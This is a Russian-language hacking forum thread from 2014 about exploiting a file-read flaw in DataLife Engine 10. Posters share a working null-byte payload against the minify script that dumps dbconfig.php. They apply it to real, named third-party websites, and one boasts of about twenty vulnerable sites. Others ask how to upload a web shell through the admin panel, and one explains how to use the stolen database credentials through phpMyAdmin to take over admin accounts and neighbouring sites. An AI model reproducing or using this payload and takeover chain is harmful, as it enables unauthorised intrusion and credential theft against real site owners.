HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #351  
Старый 26.03.2014, 16:07
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

в десятых версиях работает где есть похожий на этот файл

./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e 9736c

тогда такой джет выводит данные

engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

если просто так вставить то не работает.
 
Ответить с цитированием

  #352  
Старый 26.03.2014, 16:34
Screami
Новичок
Регистрация: 14.03.2010
Сообщений: 1
Провел на форуме:
15489

Репутация: 0
По умолчанию

Цитата:
Сообщение от Donnel  
Donnel said:
Или тебе повезло, или админ сайта плохо защитил файлы, или мне, наоборот, не везет - у меня не работает.
а я уже сайтов 20 нашёл.

вот например:

Цитата:
Сообщение от None  
http://www.dle9.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
 
Ответить с цитированием

  #353  
Старый 26.03.2014, 21:38
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Screami  
Screami said:
а я уже сайтов 20 нашёл.
вот например:
Молодец!, хорошая бага! +
 
Ответить с цитированием

  #354  
Старый 11.04.2014, 16:17
mr.Arec
Guest
Сообщений: n/a
Провел на форуме:
1334

Репутация: 0
По умолчанию

Кто может помочь залить шелл через админку

версия движка 10

есть доступ в админку
 
Ответить с цитированием

  #355  
Старый 18.04.2014, 17:14
pharm_all
Познающий
Регистрация: 10.09.2009
Сообщений: 40
Провел на форуме:
72737

Репутация: 1
По умолчанию

Цитата:
Сообщение от Screami  
Screami said:
а я уже сайтов 20 нашёл.
вот например:
В примере конфиг не читается!

400 Bad Request

Please see http://code.google.com/p/minify/wiki/Debugging.

есть рабочий пример?
 
Ответить с цитированием

  #356  
Старый 18.04.2014, 21:52
lansia
Guest
Сообщений: n/a
Провел на форуме:
42267

Репутация: 5
По умолчанию

Цитата:
Сообщение от pharm_all  
pharm_all said:
В примере конфиг не читается!
400 Bad Request
Please see http://code.google.com/p/minify/wiki/Debugging.
есть рабочий пример?
http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
 
Ответить с цитированием

  #357  
Старый 19.04.2014, 21:57
06shurik
Guest
Сообщений: n/a
Провел на форуме:
984

Репутация: 0
По умолчанию

Цитата:
Сообщение от lansia  
lansia said:
http://erolib.ru/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?
 
Ответить с цитированием

  #358  
Старый 20.04.2014, 00:44
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от 06shurik  
06shurik said:
бага интересная, и вопрос такой, как раскрутить эту багу, т.е через что за юзать и вытащить данные от админки или залить шелл?
Эта бага, используется как обычная читалка файлов, можете локально читать конфиги для подключения к БД, а дальше к примеру через phpmyadmin, заходите и берете логин/пасс админа и профит! или если есть соседние сайты, то ищите путь к ним и по такому же прицепу, хорошим плюсом было бывает, когда удаленное подключение к БД идет, тогда вам phpmyadmin искать не прийдется)
 
Ответить с цитированием

  #359  
Старый 21.04.2014, 14:28
Donnel
Guest
Сообщений: n/a
Провел на форуме:
1897

Репутация: 0
По умолчанию

Народ, бага шикарна, согласен, увидел примеры, аплодирую стоя. Но у меня она выдает 400 Bad Request. Не на все сайты, а на один (!). Что за черт? Подскажите.
 
Ответить с цитированием

  #360  
Старый 01.08.2014, 17:38
strelok20094
Guest
Сообщений: n/a
Провел на форуме:
24770

Репутация: 2
По умолчанию

Скорее всего пофиксили уже, но что делать если при переходе по site.com/engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js

Происходит редирект :3
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Сценарии/CMF/СMS 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ